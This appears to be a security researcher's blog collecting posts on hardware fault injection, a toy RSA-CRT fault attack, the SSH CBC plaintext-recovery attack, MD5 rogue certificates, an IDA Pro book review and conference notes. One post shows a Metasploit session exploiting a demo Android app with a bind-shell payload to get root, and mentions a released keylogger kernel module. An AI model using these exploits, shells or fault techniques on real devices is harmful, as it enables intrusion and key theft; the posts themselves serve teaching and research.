So you read my last post and were left wondering how the heck you would be able to inject temporary faults into hardware devices? Here is your answer 🙂
In that post, I explained how to extract keys from cipher implementations assuming we could somehow inject faults during the execution of the cipher. Besides DFA attacks, I also said we could achieve something similar to what we do with software protections (i.e. modifying control flow, bypassing checks, etc.) using fault injection techniques. I thought it was worth giving a few examples of how to inject faults in real hardware to complete the picture.
When hardware is designed, it is engineered to work under certain conditions of temperature, input voltage ranges, clock frequencies, etc. The hardware is tested under those conditions and is supposed to function in that range... and there are no guarantees that it will operate correctly if you bring it outside them.
I guess you follow my reasoning already 🙂 So if we want to inject faults into hardware, a good place to start looking is exactly in those gray areas around the operating conditions. Of course, we want the chip to be functioning properly most of the time, and we want it to fail at the precise moment at which it is computing something sensitive (say a secure boot check, or an RSA-CRT signature). Thus, we probably need to have some control over the timing, and inject the fault only temporarily.
In this post I am introducing from an intuitive perspective three ways of injecting faults: voltage, clock and laser/optical glitching.
The first example I want to touch on is that of voltage (or VCC) glitching. In this case, we typically run the chip at its nominal voltage (say 3.3V), and whenever we want to inject a fault, we drop voltage down to e.g. 1V.
At this moment, the input voltage to certain gates within the chip will be too low due to the reduced supply voltage. Thus, these gates will receive an input voltage below the threshold that separates a logical zero from a one, no matter what value the signal was supposed to carry.
Then we increase the voltage again to the nominal voltage of 3.3V, and we have a functioning chip that just failed to execute one of its operations. For instance, it failed to execute a conditional jump and fell through to the code that we wanted to have executed.
The trick here is to find the proper parameters for the glitch: voltage drop (do we go to 0V, to 0.4V, to 1V ...), length of the glitch (a few nanoseconds, a few microseconds?) and the timing. Typically, if voltage drop and length of glitch are too small, the chip will function properly. If they are too large, it will just die (mute, reset, or maybe even physically damaged). Of course, if the timing is wrong then the attacker will never see the effects he wants to see.
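In practice, finding those parameters is a search campaign over the glitch space. Below is a minimal sketch of such a search loop; `attempt_glitch` is a made-up stand-in for real glitching hardware (normally an FPGA or a dedicated glitcher driving the target's VCC line), with an invented "sensitive window" so the loop can run on its own:

```python
import random

# Hypothetical sketch of a voltage-glitch parameter search. attempt_glitch()
# simulates the target's response; every threshold in it is invented purely
# for illustration.
def attempt_glitch(drop_v, width_ns, offset_ns):
    """Return the simulated target response: 'normal', 'dead' or 'glitched'."""
    if drop_v > 2.0 or width_ns < 50:        # glitch too weak: no effect
        return "normal"
    if drop_v < 0.3 and width_ns > 400:      # too aggressive: chip resets/dies
        return "dead"
    # the fault only lands if we hit the sensitive instruction in time
    return "glitched" if 990 <= offset_ns <= 1010 else "normal"

def search_parameters(trials=20000, seed=0):
    """Randomize (voltage, length, timing) and log successful combinations."""
    rng = random.Random(seed)
    hits = []
    for _ in range(trials):
        params = (round(rng.uniform(0.0, 3.3), 2),  # voltage we drop to (V)
                  rng.randrange(10, 1000, 10),      # glitch length (ns)
                  rng.randrange(0, 2000, 5))        # delay after trigger (ns)
        if attempt_glitch(*params) == "glitched":
            hits.append(params)
    return hits

hits = search_parameters()
```

Real campaigns work the same way: sweep or randomize the parameters, classify each response (normal / mute / reset / faulted), and zoom in on the regions that produce exploitable faults.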
As a protection against this kind of glitching, most modern smart cards and some embedded devices incorporate voltage sensors that detect whether the voltage went below a certain value or not. However, this attack is still effective against a wide range of products.
Clock glitching is similar to VCC glitching in the sense that it affects another critical parameter of the chip that the attacker can control. In this case, what we do is inject spurious clock cycles that are much shorter than the original clock cycle.
Since the internal logic of the chip operates based on its clock, a short clock cycle will trigger a new operation before the results of the previous one have been completely computed or propagated through the device.
Imagine you have to multiply two values, and then add a third value to the result. Normally, multiplying values takes longer than adding them. Thus, the clock period for a chip that only performs these two operations would be made long enough for the multiplication to complete and its result to be ready at the input of the next stage, since that is the critical operation.
Now, if I tell you to start adding before you have received the multiplication result, you will be using invalid (old?) data instead of the correct product. Thus, you will fail to compute the correct result.
Clock glitching exploits exactly that situation. Again, finding the right parameters in this case is the key to success.
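For illustration only, the stale-data effect can be modeled in a few lines. Every number below is invented: a multiplier that needs 3 time units to settle, an adder fed from a register that latches on each clock edge:

```python
# Toy model of a multiply-then-add pipeline. Registers latch on each clock
# edge; the multiplier needs 3 time units to settle. All numbers are made up.
def run(a, b, c, clock_period):
    mult_reg = 0      # register between multiplier and adder (stale at start)
    settled = 0       # how long the multiplier inputs have been stable
    result = None
    for _edge in range(2):        # two clock edges: latch product, then add
        settled += clock_period
        if settled >= 3:          # multiplier had time to finish
            mult_reg = a * b
        # else: the register keeps whatever stale value it held
        result = mult_reg + c
    return result

correct = run(6, 7, 5, clock_period=3)   # slow clock: 6*7 + 5 = 47
glitched = run(6, 7, 5, clock_period=1)  # glitched clock: stale product used
```

With the normal clock the adder sees the finished product; with the short clock it latches the stale register contents and computes garbage, exactly the failure mode a clock glitch induces.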
As for hardware-level protections, frequency sensors and internally generated clocks (on-die oscillators) are the most common ways to protect against clock glitching.
Additionally, fast clocks make these attacks less practical for attackers, since they need to inject even faster clock cycles and synchronize their attack at a higher speed.
This is why clock glitching is less effective nowadays: most high-end smart cards use their own on-die clocks, and embedded systems require much higher clock speeds.
After clock and VCC glitching, we move to the real king of current fault injection attacks. Optical fault injection, or most commonly Laser fault injection, uses a light beam to inject faults into semiconductor devices.
How is this possible? Well, light (physicists, don't kill me!) basically consists of a number of photons carrying a certain amount of energy. Roughly, when these photons reach a semiconductor (typically silicon in electronic devices), their energy is absorbed by the semiconductor.
Given enough energy, electrons that would otherwise be still within the semiconductor will start to move, creating current. So, for our chips, this means that some of the transistors in the chip will actually switch when they should not!
The big difference between this fault injection technique and the previous ones is that in this case we actually have spatial selectivity (or resolution): we can choose which parts of the chip we attack by pointing the laser beam to them.
Of course, this is very powerful but at the same time it adds extra complexity to the attack: now you need to find the sensitive spots in the chip. As before, there are a number of parameters one needs to play with in order to successfully inject faults: glitch timing, glitch length, wavelength of the injected light and amount of energy injected.
Also, this attack is semi-invasive: we need to open up the chip package so that the light radiation can reach the die. Otherwise, the light will be blocked by the package or the plastic around the smart card die. Thus, this attack provides additional power at the cost of additional complexity, as usual.
In terms of hardware-level protections, this is also the most difficult attack to prevent. Typically, light sensors are scattered around the chip, but manufacturers cannot place sensors everywhere (that's expensive!) so there are always open spots.
At the end of the day, fault injection protection requires a combination of hardware and software prevention and detection mechanisms: typically sensors at the hardware level and double-checks and redundancy at the software side.
Due to the difficulty of completely preventing this kind of attack, fault injection attacks are nowadays one of the main threats to secure hardware. Additionally, this difficulty, together with the physical nature of the attacks, also means that simulating them is typically not enough to assure appropriate protection levels, making fault injection testing key for secure hardware.
So, after more than a year without writing anything here, I was bored today and thought it would be nice to share a new piece on attacking cryptographic implementations here 🙂
Differential Fault Analysis (DFA) attacks are part of what is known as fault injection attacks. That is, they are based on forcing a cryptographic implementation to compute incorrect results and attempting to take advantage of them. With fault injection attacks (also often called active side channel attacks) one can achieve things like unauthenticated access to sensitive functionality, bypassing secure boot implementations, and basically bypassing any security check an implementation performs.
With DFA attacks, one is able to retrieve cryptographic keys by analyzing correct/faulty output pairs and comparing them. Of course, this assumes you are able to inject faults somehow... which is often true in hardware implementations: gaming consoles, STBs, smart cards, etc. At the software level, one can achieve similar things by debugging the implementation and changing data or by patching instructions... but this is something we have been doing for a long time, haven't we? 🙂 I often say that fault injection attacks are the analog version of 'nopping' instructions out in a program, although we often do not know exactly what kind of faults we are injecting (i.e. we often miss a fault model, but we still successfully attack implementations in this way).
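A classic concrete example of this idea is the Bellcore attack on RSA-CRT signatures: a single fault in one of the two half-exponentiations lets you factor the modulus with a gcd. A toy sketch (tiny primes chosen for readability; real keys are 2048+ bits):

```python
import math

# Sketch of the Bellcore DFA attack on RSA-CRT signatures.
p, q = 104723, 104729            # toy primes; the "secret" factors of n
n = p * q
e = 65537
d = pow(e, -1, (p - 1) * (q - 1))

def sign_crt(m, fault=False):
    """RSA signature via CRT; 'fault' corrupts only the mod-p branch."""
    sp = pow(m, d % (p - 1), p)
    sq = pow(m, d % (q - 1), q)
    if fault:
        sp ^= 1                   # the injected fault: one flipped bit
    h = (pow(q, -1, p) * (sp - sq)) % p   # Garner recombination
    return sq + q * h

m = 123456789
s_good = sign_crt(m)
s_bad = sign_crt(m, fault=True)

# The faulty signature is still correct mod q but wrong mod p, so the
# difference of the two signatures shares exactly the factor q with n.
recovered = math.gcd(s_good - s_bad, n)   # == q: the modulus is factored
```

One correct/faulty signature pair over the same message is all it takes; with the variant gcd(s_bad^e - m, n), even a single faulty signature suffices.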
There are ways to protect against this kind of attack as an application programmer, but this is not the objective of this post. In the remainder of this post, I will explain two powerful DFA attacks on two modern cryptographic algorithms: RSA and (T)DES. For some information on protecting from these attacks as a programmer, take a look at these slides. If there is some interest, I will outline the most common techniques to perform fault attacks in a future post.
It's been almost a month since RootedCON, but I didn't have any time to spend on preparing the .tgz file with the example shellcodes, poc apps and exploits we showed during our talk. And neither did I publish any kind of summary or anything about the event...
Examples from our presentation on Android exploitation
First things first, here are the examples we used during the presentation. As a quick summary, this is how I use the buffer overflow exploit.
First, launch the emulator and wait for it to start. Then, with adb you need to forward a couple of ports: 2000 for the vulnerable apps and whatever you like for your bind shell. Then you can launch the binary, which I had uploaded using adb push to /data/bin/myapp:
eloi@EloiLT:~/android/paper$ adb forward tcp:2000 tcp:2000
eloi@EloiLT:~/android/paper$ adb forward tcp:2222 tcp:2222
eloi@EloiLT:~/android/paper$ adb shell
# /data/bin/myapp
Now, you can launch the exploit from metasploit:
msf > use exploit/linux/misc/android_stack
msf exploit(android_stack) > set payload linux/armle/shell_bind_tcp
payload => linux/armle/shell_bind_tcp
msf exploit(android_stack) > set RPORT 2000
RPORT => 2000
msf exploit(android_stack) > set LPORT 2222
LPORT => 2222
msf exploit(android_stack) > exploit
[*] Started bind handler
[*] Command shell session 1 opened (127.0.0.1:55207 -> 127.0.0.1:2222)
[*] Command shell session 1 closed.
msf exploit(android_stack) > exploit
[*] Started bind handler
[*] Command shell session 2 opened (127.0.0.1:34834 -> 127.0.0.1:2222)
/system/bin/id
uid=0(root) gid=0(root)
exit
[*] Command shell session 2 closed.
msf exploit(android_stack) >
The same thing applies to the cpp_challenge demo application. You just use a different exploit, but that's it. Beware that you might have to tune some addresses on your local installation, as they are hardcoded. However, I believe they should be static for every installation.
In addition to the apps and the Metasploit stuff, you can also find two kernel modules. One is a simple find-syscall-table module, and the other one is a keyboard logger. The latter only works for Linux >= 2.6.28; for earlier versions you need to change it slightly.
I won't spend much time on it, as it's been quite some time already and I don't feel like writing a complete summary of it.
Overall I think it was a great event. Sure, there is room for improvement, as everywhere, but for a first edition it was very good. Of the talks I attended, in my opinion there were great ones but also one or two I didn't really like. On our side, we are pretty happy with the way our talk was received and the reactions we have seen 🙂
Besides the talks, and probably even more important, it was great to meet so many people that I'd only know through the Internet otherwise. Cheers to all of you guys, hope to see you next year at RootedCON or maybe earlier somewhere else 🙂
Last week a rumor arose about a 0-day exploit on OpenSSH being actively exploited. In some places I found links to Bugtraq's note about the OpenSSH attack described in a paper from Royal Holloway, University of London, back in November 2008.
The paper, Plaintext Recovery Attacks Against SSH, describes an attack which provides knowledge of 32 bits of an arbitrary ciphertext block from an SSH connection when CBC mode is used. Personally, I didn't read the paper when it was published; I just took a quick look at it and didn't feel like reading it in full.
However, when I saw the stir generated around this issue, I thought it was time to pick it up again. And this post is the result: an attempt to explain how the attack described in the paper works.
SSH Binary Packet Protocol
SSH BPP is the protocol in charge of defining the binary packet structure of SSH, which carries the encrypted packets that make up an SSH connection. A data packet in an SSH connection is encoded as follows:
The Length field (4 bytes) indicates the size of the remainder of the packet. The Padding length field (1 byte) encodes the length of the final padding, which makes the packet a multiple of the block size. After this field comes the message, and finally the padding, which must be between 4 and 255 bytes of random data.
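This layout can be sketched in a few lines of code (a simplified encoding of the plaintext part of an SSH BPP packet, following the field description above; a 16-byte cipher block is assumed here):

```python
import os
import struct

BLOCK = 16  # cipher block size in bytes (16 assumed here, e.g. AES)

def encode_bpp(payload: bytes) -> bytes:
    """Build the plaintext part of an SSH BPP packet:
    4-byte length | 1-byte padding length | payload | random padding."""
    # padding must be at least 4 bytes and pad the packet to a block multiple
    pad_len = BLOCK - ((4 + 1 + len(payload)) % BLOCK)
    if pad_len < 4:
        pad_len += BLOCK
    packet_len = 1 + len(payload) + pad_len  # everything after the length field
    return struct.pack(">IB", packet_len, pad_len) + payload + os.urandom(pad_len)

pkt = encode_bpp(b"hello, ssh")
packet_len, pad_len = struct.unpack(">IB", pkt[:5])
```

Note that the 4-byte length field sits at the very start of the packet, inside the first ciphertext block; that detail is exactly what the attack below exploits.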
Two cryptographic operations are applied to this message: an encryption and a MAC. The MAC is computed over a sequence number which is never transmitted (it is kept by the two ends of the communication) concatenated with the original message depicted above. The encryption is applied to the original message only.
Therefore, when SSH receives a packet, the first thing it has to do is decrypt the first ciphertext block to obtain the message length. Then, it waits for as many bytes as that length indicates, decrypts them and checks the packet's integrity with the MAC, which provides message authentication and protects your SSH sessions against modification while they travel between client and server.
SSH BPP's problem
The problem with SSH BPP described in the paper is a consequence of the combination of several factors. On the one hand, OpenSSH returns different error messages for different situations: when the decrypted length does not pass some sanity checks (e.g. it is not a multiple of the block size) and when the computed MAC does not match the valid one. Therefore, by observing the error messages one can obtain information on what caused the interruption of the connection.
On the other hand, we have that the first block indicates how many bytes the server waits for before calculating the complete MAC. Therefore, assuming the sanity checks over the message length are passed, an attacker could inject a data block, and then inject block by block until the server says "Hey, wait, the MAC does not match!".
At that point, the attacker knows that after decrypting the injected block with the server's key, the result contains in its first (left-most) 32 bits a value equal to the number of bytes injected into the connection.
But now the complicated part starts, because the attacker needs to link these obtained 32 bits with the 32 bits that the original packet held. If the packet was encrypted with a completely unrelated key, then knowing that decrypting it under a different key gives a certain value provides basically no information on the original message.
But here CBC mode comes into play. We already know from our previous block ciphers post that this mode XORs the previous ciphertext block with the current plaintext block before encrypting it with a fixed key.
Let's assume we want to obtain data from a ciphertext block c*_i of a previous packet, which is part of the current SSH connection. After decrypting it we would have:

p*_i = D_K(c*_i) ⊕ c*_{i-1}
But when we inject it into the connection, assuming the previous ciphertext block c_n (the last block the server received before our injection) is known, then the SSH server will compute this:

p'_1 = D_K(c*_i) ⊕ c_n
So, it will decrypt the injected block, and will XOR it with the previous block. This result will be regarded as the first block of a packet, and therefore its initial 32 bits will tell the server the packet length.
Thus, we can start injecting new blocks and observing the reaction of the SSH server. Once it returns a MAC error, this means that the initial 32 bits of p'_1 contain the number of bytes we injected so far.
Further, from the previous two equations we can obtain the following relation:

p*_i = p'_1 ⊕ c_n ⊕ c*_{i-1}

where the left-most 32 bits of all values on the right side of the equation are known, and the value on the left side is what we wanted to obtain. In this way we get to know the left-most 32 bits of the target block.
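That XOR relation can be checked with a small CBC simulation. The block cipher below is a made-up toy Feistel construction (any block cipher behaves the same for this CBC property); the last lines reproduce the attacker's computation:

```python
import hashlib
import os

BLOCK = 16

def _round(key: bytes, data: bytes) -> bytes:
    """Round function of a toy (made-up) Feistel block cipher."""
    return hashlib.sha256(key + data).digest()[:8]

def E(key, block):
    l, r = block[:8], block[8:]
    for i in (0, 1):
        l, r = r, bytes(a ^ b for a, b in zip(l, _round(key, bytes([i]) + r)))
    return l + r

def D(key, block):
    l, r = block[:8], block[8:]
    for i in (1, 0):
        r, l = l, bytes(a ^ b for a, b in zip(r, _round(key, bytes([i]) + l)))
    return l + r

def xor(x, y):
    return bytes(a ^ b for a, b in zip(x, y))

def cbc_encrypt(key, iv, blocks):
    out, prev = [], iv
    for p in blocks:
        prev = E(key, xor(p, prev))
        out.append(prev)
    return out

key, iv = os.urandom(16), os.urandom(16)
plain = [os.urandom(BLOCK) for _ in range(4)]
cipher = cbc_encrypt(key, iv, plain)

# Target: recover plain[2] (p*_i); its ciphertext block is cipher[2] (c*_i).
# We inject c*_i as the first block of a "new packet"; the server XORs its
# decryption with the last ciphertext block it saw, c_n = cipher[3]:
c_n = cipher[3]
p1_prime = xor(D(key, cipher[2]), c_n)   # what the server treats as block 1
# (in the real attack only the first 32 bits of p1_prime leak, via the
# number of bytes the server accepts before raising the MAC error)

# attacker relation: p*_i = p'_1 XOR c_n XOR c*_{i-1}
recovered = xor(xor(p1_prime, c_n), cipher[1])
```

The simulation recovers the full target block because it "leaks" all of p'_1; the real attack only leaks the length field, hence 32 bits per successful attempt.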
Implications of this attack
So, we know how the attack works... now it's time to ask ourselves whether we should be worried about it or not. In principle, the attack is not too complex and allows the retrieval of 32 arbitrary bits of an SSH connection with a probability of 2^-18. This probability comes from the conditions that need to be satisfied in order to pass the sanity checks after decrypting the injected block.
This means that, on average, an attacker would succeed one out of roughly 262,000 times, forcing the client to reconnect to the server that many times. I'm pretty sure anyone would be tired after 3 consecutive attempts and would think that something is wrong ;-).
Further, the attacker needs to perform a man-in-the-middle attack to be able to inject data into the connection. On a local area network that is not a big deal, but over the Internet it gets more complicated.
And even then, the attacker would obtain 32 bits of data: 4 ASCII characters of your password... which I hope is longer than that :D. Therefore, in my opinion the attack does not have practical implications, although it's always good to update to a patched version and/or use a mode other than CBC.
What this attack does contribute is an interesting example of how important details are in crypto applications and protocols. If the protocol did not depend on a length field that must be decrypted before knowing how many bytes to wait for, or did not use CBC mode, or simply did not return additional information about errors (just closing the connection indicating that something was wrong, regardless of what that something is), none of this would be possible.
Take a look at his post, it's a typical problem found in string/array comparisons, and you should take it into account when programming embedded devices and any other security-related code in general.
PS: I said very soon, didn't I? 😛
Yesterday, the 30th, a vulnerability in the Internet PKI was published at the CCC, explaining how the researchers had managed to obtain a certificate that is perfectly valid for most web browsers but contains fake data. They obtained a certificate signed by a certification authority (CA) trusted by most browsers, whose identity data could then be changed: the CA signed one certificate, but a derived certificate was obtained for which the same signature remains valid while the data has been arbitrarily modified.
The attack was published by a group of researchers, among them Benne de Weger, a professor at TU Eindhoven who taught me Cryptography 2 last year.
How is this possible?
Basically, they used the same technique as for the prediction of US presidents that I wrote about a while ago. They obtained a valid certificate for an apparently legitimate site from a trusted CA, and then created a certificate that produces an MD5 collision.
The exact method is, as I said back then, to have a chosen certificate prefix, a random-looking section that makes some intermediate MD5 state collide, and then a final part common to both certificates. Since from the collision point onwards both documents are identical, their MD5 hashes will be the same.
Even so, finding the collision is not that easy, since there are certain elements that vary between one certificate and the other and must be predicted. For example, the certificate serial number or the validity period of the certificates the CA will issue.
For the attack, the researchers tried different CAs and attempted to predict these values. In the end, six commercial CAs gave them certificates they could use to create collisions.
And what does this mean?
Basically, someone could get their own certificate signed by one of these authorities for malicious purposes. They could then perform a MiTM attack on SSL connections without us noticing the intruder, because the certificate used would be accepted by our browser without complaint.
Now, is this really such a serious problem? To start with, for most users the 'this certificate is not valid' warning only means something like 'you have to click accept to get in'. In that situation, certificates or no certificates, it is not worth wasting time creating a valid certificate if users are going to ignore the warnings and enter anyway.
Besides, the problem is not with the PKI but with MD5. The solution is to move to another hash function such as SHA-256 or SHA-512, and to use random serial numbers for signed certificates. Anything predictable can lead to problems; we saw it with DNS and we see it now with certificates.
As they say at layer 8:
What I'm here to say is, I don't really think this matters all that much except to security researchers. Here's why: normal users' trust has very little to do with certificates.
If you want technical information on exactly how this works, everything is explained in detail here. I'm sure I've left something out... but I just wanted to say that it's not thaaat bad, and that it was to be expected after the previous MD5 attacks were published. And the same goes for SHA-1: if it keeps being used, it will probably end in something very similar to this.
[DISCLAIMER: This post is in English since the book is in English too... and whoever is interested will understand it]
At the beginning of last month I ordered a copy of The IDA Pro Book by Chris Eagle from Amazon. Since reversing has been one of my pending subjects for a while now, and after seeing the book recommended by Ilfak himself, I decided to buy it. I've just finished my first reading of the whole book, and before going on to apply the acquired knowledge I thought it might be useful to share my opinion with you.
The book is divided into six different parts. Part I, Introduction to IDA, covers the very basics of disassembling, reversing and reversing tools, and IDA Pro itself.
Part II, Basic IDA Usage, introduces the reader to the IDA world in chapters 4 to 10. After introducing the user interface and the different IDA displays, Chris Eagle goes into disassembly navigation and manipulation, data types, cross-references and graphing, and finally the different IDA flavours apart from the normal Win32 GUI version (console mode for Windows, Linux and OS X). Chapter 8, on data types and data structures, also provides nice coverage of C++ reversing, showing how to locate vtables and explaining inheritance relationships, among other things.
Part III, Advanced IDA Usage, extends the knowledge provided in the previous part by discussing IDA's configuration files, library recognition methods, how to extend IDA's knowledge of library functions and, although it is not its main purpose, what IDA can do for us if we want to patch a binary.
Part IV of the book discusses the available options to extend IDA's functionality: IDC scripts, the IDA SDK, plug-in development, and processor and loader modules. To be honest, I skipped a big chunk of this part because I believe it is not worth it right now. I'll come back to these chapters once I start disassembling things and need to tailor IDA's functionality to my needs.
Part V discusses how to deal with real-world problems. It starts with a chapter about the different assembly code produced by different compilers for the same source code, and then goes into a very interesting description about obfuscated code analysis (from the static analysis perspective mainly). Next, Eagle gives some hints on how to use IDA for finding vulnerabilities and provides a list of several useful real-world IDA plugins.
The last part of the book, Part VI, discusses the IDA debugger and its integration with the disassembler. It starts with an introductory chapter, continues with a discussion of that integration, and ends with a chapter about remote debugging with IDA.
As you have seen, this book provides a thorough coverage of IDA's capabilities, and gives real world examples. The examples, together with the IDC and plug-in code, make it a very interesting reading for those willing to learn about reversing and about the most popular disassembler these days.
If you'd like to learn how to use IDA efficiently, how to tailor it to your needs and automate your static analysis tasks, this is your book. Definitely, it is worth the money if you want to get into IDA and have a good reference book.
Since I've been feeding you very little (really, very little) lately, here I come with some fresh and interesting documents 🙂
On the one hand, the University of Nijmegen published not long ago a paper on their attacks on NXP's Mifare Classic chip. It can be found on their page dedicated to RFID topics... I only had a quick look at it, but the paper looks promising.
On the other hand, Wesley McGrew has published on his blog some slides about the Ext2/Ext3 file systems, their data structures, and the interesting things they hold from a forensic analysis point of view. If you don't know how these filesystems work, it is worth a look to understand them.
Finally, a new issue of Uninformed Magazine has been published. There are 4 articles, two on reverse engineering and two on exploitation techniques. Honestly, they all sound interesting... as soon as I have some time I'll get to them.
Enjoy!
El Maligno has announced that tonight at 20:00 Reto Hacking IX begins. The challenge has 10 levels, and besides counting towards the overall ranking of this year's hacking challenges, the prizes are these (copy-pasted from El Maligno's post):
- First: Glory, fame, the honor of writing a walkthrough and answering an interview for El lado del mal. Plus a dinner and some drinks in your city (if the person I'm thinking of wins, the mole's mother will be off to Zurich) that will go down in history with photos you won't-want-your-descendants-to-see.
UPDATE: The winner will get a Defcon 16 badge.
- Second: The honor of being the first Luser, the great loser, the official loser. The honorary title of Luser of Reto Hacking IX and yes, a dinner, but you pay for the drinks; you should have won if you wanted them for free.
UPDATE: The runner-up will get three Defcon 16 stickers.
- Third: You get a hacking book so you can keep practicing and reach the glory of being the champion, or the No Luser.
UPDATE: Third place will get one Defcon 16 sticker.
If I have time I'll give it a go now and then, although I'm presenting my final-year project within a week and then the town festivities come, so I won't have much free time...
Good luck to those of you who decide to join!
EDITED: Yesterday I spent a little while on it when I got home at 9, a bit more after dinner and another stretch when I came back from going out. It's all about breaking CAPTCHAs; I passed levels 1-5, but level 6 is resisting me... I see NOTHING so far 😳.
I'm writing the solutions in PHP with libcURL, reusing a script I used at the 2006 CampusParty (I think). Ring a bell, Javi? xD This time it's about doing 'similar' things, but you have to get past the captcha 1000 times in 60 minutes, so automating it is key (and the waiting is a pain xD).
EDITED 2: We already have a winner. Kachakil has just taken the victory and the 10 points... the guy is at the top in every challenge. Congratulations from here!
After a whole month without writing a post, and with a half-finished draft of the protocol verification series sitting around for ages (in which I hoped to clarify how the model stuff works and how to prove a protocol in a more understandable way, since I know the theory is a bit of a drag and hard to follow; it happened to me too at the beginning...), I'm writing this one to see if I get back in the mood for writing.
Yesterday pagetable.com published a talk given at Google about the Xbox 360 security system and how it was hacked. It starts with an overview of security in the original Xbox, to show the problems it had and the possible solutions. It then reviews the Xbox 360 architecture and finally shows the hack that was performed.
It really is interesting and gives a good idea of how hardware platforms can be designed in a fairly secure way. You can find it at http://www.youtube.com/watch?v=uxjpmc8ZIxM .
Now I still have to take a look at this group's related talks. There is one from the last CCC, and I've been told there is one about the Wii; I'll look for them and comment here if they seem interesting.
Edited: I've now watched the CCC presentation. It follows the same line: it explains the same Hypervisor-mode bug, but it also covers a timing attack against the HMAC comparison done with memcmp on Wiis sold until late 2007. They also demo Linux on the Xbox 360, and at the end they talk a bit about the Wii and how keys can be read from memory because it doesn't use encrypted RAM.
You can find the CCC talk here.